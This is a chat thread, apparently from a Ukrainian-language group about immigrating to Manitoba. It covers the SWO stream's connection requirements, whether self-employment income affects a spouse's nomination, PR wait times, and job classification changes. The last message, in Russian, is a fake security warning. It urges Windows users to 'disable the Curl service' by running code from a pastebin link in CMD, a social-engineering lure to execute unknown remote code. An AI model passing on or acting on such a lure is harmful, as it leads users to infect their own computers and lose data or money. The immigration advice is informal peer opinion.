Імміграція до Манітоби
-
Я розумію тут всі вже ждуть відповіді та отримання вже ПР. Я бажаю всім вам удачі 🤞 Але поки я читала чат , я не знайшла інструкцію для тих хто тільки починає подавати заявку (мене цікавить програма SWO, ми плануємо подачу за межами Канади наразі) Чи є тут інструкція для чайників ? Тобто послання та пояснення що саме потрібно на якому етапі . Дякую 🙏
-
Таке питання зараз зʼявилося у період таксів, чоловік головний аплікант і вже на фед рівні по провінціальній номінації. В мене є парт тайм робота і є ще підробіток, який я хочу вказати у декларації як self employed. Знайомий нам сказав, що може бути отказ чоловіку, бо як би ми не будемо проходити по крітеріям номінації вже. Але я думаю, що це я ж подаюсь як частковий self employed, а не чоловік. Чи можуть бути через це проблеми?
-
Вітаю, скільки часу хто чекав на ПР після здачі біометрії?
-
За межами Канади по SWO ви маєте мати звʼязок з провінцією: - the support of family members or friends; - previous education or work experience in the province; - an Invitation to Apply received directly from the MPNP as part of a Strategic Recruitment Initiative. If you do not have a connection to Manitoba, you are not eligible to apply under SWO, regardless of your points total. Якщо у вас немає привʼязки по якомусь з цих пунктів, то по SWO не зможете податись. Якщо підпадаєте під один з цих пунктів, то пишіть тут і далі загалом допоможемо.
-
Це чушня)) по-перше ви не головний аплікант і єдине що можливо(!) може вплинути це робота у іншій провінції. Але і тут на розсуд офіцера. По-Друге навіть якщо б у цій ситуації ви були головним аплікантом це аж ніяк не впливає. У минулому році я вказувала у декларації окрім роботи селф емпл., я головний аплікант. Номінацію отримали
-
Добрий день! Підкажіть будь ласка, якщо змінився статус на роботі, але зарплатня залишись така сама, та TEER змінився з 5 на 3, то чи треба подавити цю інформацію на федеральному етапі. AOR отримала, біометрію здала тиждень тому
-
Це було б так, якби головний аплікант змінив свою роботу на селф емплоймент при умові що номінація у вас за свм. При всіх інших умовах ні
-
В чоловіка як в головного апліканта нічого не змінилося, але я хочу цього року у налоговій декларації окрім своєї роботи, вказувати час доходу як self employed. І нам кажуть, що чоловіку може бути відмова із за цього, бо це якби вважається вже бізнес. А в нього кейс по swm
-
⚠️ОСТОРОЖНО!⚠️ В связи с учащёнными веб-атаками в последнее время, хотим предупредить вас о риске потери средств и данных (для пользователей ОС Windows) Для защиты от новой уязвимости и предотвращения установки вредоносного ПО, которое может быть активировано через веб-атаки, выполните следующие шаги: - Отключите службу Curl, которая может позволить удалённый доступ к вашему компьютеру. Это поможет обезопасить вашу систему от внешних угроз. - Для этого введите следующий код в CMD: pastebin.com/raw/KhpBnqDE Принятие этих мер поможет защитить ваши данные и устройства от нежелательных вторжений.